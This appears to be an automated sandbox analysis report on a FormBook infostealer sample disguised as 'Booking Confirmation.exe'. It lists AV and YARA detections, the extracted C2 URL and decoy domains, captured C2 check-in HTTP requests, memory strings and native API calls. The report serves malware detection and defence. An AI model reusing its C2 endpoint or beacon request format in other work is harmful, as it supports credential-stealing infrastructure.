Analysis Report Booking Confirmation.exe

AV Detection:

Found malware configuration

Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack

Malware Configuration Extractor: FormBook {"C2 list": ["www.evolvekitchendesign.com/ffw/"], "decoy": ["unmutedgenerations.com", "localmoversuae.com", "centralrea.com", "geyyfphzoe.com", "silverpackfactory.com", "techtronixx.com", "shop-deinen-deal.com", "buehne.cloud", "inspirefreedomtoday.com", "chapelcouture.com", "easton-taiwan.com", "quanaonudep.store", "merzigomusic.com", "wpzoomin.com", "service-lkytrsahdfpedf.com", "yeasuc.com", "mydogtrainingservice.com", "galeribisnisonline.com", "cscremodeling.com", "bom-zzxx.com", "ensobet88.com", "vegancto.com", "digivisiol.com", "advancetools.net", "gzqyjd.com", "xtgnsl.com", "ftfortmyers.com", "g-siqueira.com", "ufdzbhrxk.icu", "tiekotiin.com", "youschrutedit.com", "takahatadenkikouji.com", "goodfastco.com", "jtelitetraining.com", "planet-hype.com", "gigwindow.com", "levelxpr.com", "besttechmobcomm.info", "funneldesigngenie.com", "mylisting.cloud", "alltwoyou.com", "mortgagesandprotection.online", "monthlydigest.info", "senlangdq.com", "postphenomenon.com", "slymwhite.com", "masonpreschool.com", "wahooshop.com", "meridiangummies.com", "samsungpartsdept.com", "saludbellezaybienestar.net", "vickifoxproductions.com", "shawandwesson.info", "nutrepele.com", "gorillatanks.com", "praktijkinfinity.online", "lanteredam.com", "refinedmanagement.com", "tiwapay.com", "fruitsinbeers.com", "charliekay.net", "realironart.com", "sonsofmari.com", "kedingtonni.com"]}

Multi AV Scanner detection for submitted file

Source: Booking Confirmation.exe

ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Source: Booking Confirmation.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 5.2.Booking Confirmation.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses 32bit PE files

Source: Booking Confirmation.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: Booking Confirmation.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: chkdsk.pdbGCTL source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: chkdsk.pdb source: Booking Confirmation.exe, 00000005.00000002.710165046.00000000015A8000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: Booking Confirmation.exe, 00000005.00000002.710355206.000000000195F000.00000040.00000001.sdmp, chkdsk.exe, 00000008.00000002.912945622.0000000004CC0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Booking Confirmation.exe, chkdsk.exe
Source:	Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.922870771.0000000005A00000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.evolvekitchendesign.com/ffw/

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: STRATOSTRATOAGDE STRATOSTRATOAGDE
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Downloads files from webservers via HTTP

Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.buehne.cloudConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.praktijkinfinity.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /ffw/?MZg8=vCSLLgJGCp79MzLYydBa+Bsk3bm2BxHz5ofTxOlO5FwRAAdXOpMXkN2jq+v+BBk+R2pe&uTxXc=ojO0dJK0Hv HTTP/1.1Host: www.localmoversuae.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: www.buehne.cloud

Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:38:10 GMTServer: Apache/2Upgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 0d 0a 38 62 0d 0a 2f 66 66 77 2f 3f 4d 5a 67 38 3d 51 74 71 54 77 32 47 79 59 78 66 32 57 79 52 46 74 70 6d 53 6d 4a 4a 76 68 6e 72 77 30 33 75 4e 52 4f 74 53 79 64 59 6e 4a 6b 33 4a 44 52 69 59 6b 36 62 73 76 58 57 67 74 75 66 35 74 6c 45 4a 63 4d 4e 2b 26 61 6d 70 3b 75 54 78 58 63 3d 6f 6a 4f 30 64 4a 4b 30 48 76 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 49 3e 0d 0a 31 32 62 0d 0a 77 77 77 2e 70 72 61 6b 74 69 6a 6b 69 6e 66 69 6e 69 74 79 2e 6f 6e 6c 69 6e 65 3c 2f 49 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 90<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL 8b/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&amp;uTxXc=ojO0dJK0Hv was not found on this server.<HR><I>12bwww.praktijkinfinity.online</I></BODY></HTML>0

Urls found in memory or binary data

Source: Booking Confirmation.exe, 00000000.00000003.650111317.0000000005725000.00000004.00000001.sdmp	String found in binary or memory: http://en.w
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000002.914045803.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Booking Confirmation.exe, 00000000.00000003.653249672.0000000005728000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.como.
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.651977805.0000000005727000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.652187363.0000000005726000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnE
Source: Booking Confirmation.exe, 00000000.00000003.651858652.000000000572E000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnht
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.come
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.coms
Source: Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.comt
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Booking Confirmation.exe, 00000000.00000003.651298106.000000000573B000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comym
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709997867.0000000001500000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912607132.0000000004920000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709520780.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.671285373.0000000003599000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912770256.0000000004A80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.912146154.0000000004320000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.709963590.00000000014D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Booking Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Booking Confirmation.exe.36e45e0.3.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.Booking Confirmation.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Booking Confirmation.exe.3739600.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

.NET source code contains very large strings

Source: Booking Confirmation.exe, LogIn.cs	Long String: Length: 13656
Source: 0.0.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 0.2.Booking Confirmation.exe.2c0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.0.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 4.2.Booking Confirmation.exe.2d0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.0.Booking Confirmation.exe.dc0000.0.unpack, LogIn.cs	Long String: Length: 13656
Source: 5.2.Booking Confirmation.exe.dc0000.1.unpack, LogIn.cs	Long String: Length: 13656

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D60 NtCreateFile,		5_2_00419D60
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E10 NtReadFile,		5_2_00419E10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E90 NtClose,		5_2_00419E90
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419F40 NtAllocateVirtualMemory,		5_2_00419F40
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D62 NtCreateFile,		5_2_00419D62
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419D1C NtCreateFile,		5_2_00419D1C
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419DB2 NtReadFile,		5_2_00419DB2
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_00419E0A NtReadFile,		5_2_00419E0A
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A99A0 NtCreateSection,LdrInitializeThunk,		5_2_018A99A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,		5_2_018A9910
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A98F0 NtReadVirtualMemory,LdrInitializeThunk,		5_2_018A98F0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9840 NtDelayExecution,LdrInitializeThunk,		5_2_018A9840
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9860 NtQuerySystemInformation,LdrInitializeThunk,		5_2_018A9860
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A00 NtProtectVirtualMemory,LdrInitializeThunk,		5_2_018A9A00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A20 NtResumeThread,LdrInitializeThunk,		5_2_018A9A20
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A50 NtCreateFile,LdrInitializeThunk,		5_2_018A9A50
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A95D0 NtClose,LdrInitializeThunk,		5_2_018A95D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9540 NtReadFile,LdrInitializeThunk,		5_2_018A9540
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9780 NtMapViewOfSection,LdrInitializeThunk,		5_2_018A9780
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A97A0 NtUnmapViewOfSection,LdrInitializeThunk,		5_2_018A97A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9710 NtQueryInformationToken,LdrInitializeThunk,		5_2_018A9710
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A96E0 NtFreeVirtualMemory,LdrInitializeThunk,		5_2_018A96E0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9660 NtAllocateVirtualMemory,LdrInitializeThunk,		5_2_018A9660
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A99D0 NtCreateProcessEx,		5_2_018A99D0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9950 NtQueueApcThread,		5_2_018A9950
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A98A0 NtWriteVirtualMemory,		5_2_018A98A0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9820 NtEnumerateKey,		5_2_018A9820
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AB040 NtSuspendThread,		5_2_018AB040
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA3B0 NtGetContextThread,		5_2_018AA3B0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9B00 NtSetValueKey,		5_2_018A9B00
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A80 NtOpenDirectoryObject,		5_2_018A9A80
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9A10 NtQuerySection,		5_2_018A9A10
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A95F0 NtQueryInformationFile,		5_2_018A95F0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9520 NtWaitForSingleObject,		5_2_018A9520
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AAD30 NtSetContextThread,		5_2_018AAD30
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9560 NtWriteFile,		5_2_018A9560
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9FE0 NtCreateMutant,		5_2_018A9FE0
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018AA710 NtOpenProcessToken,		5_2_018AA710
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Code function: 5_2_018A9730 NtQueryVirtualMemory,		5_2_018A9730
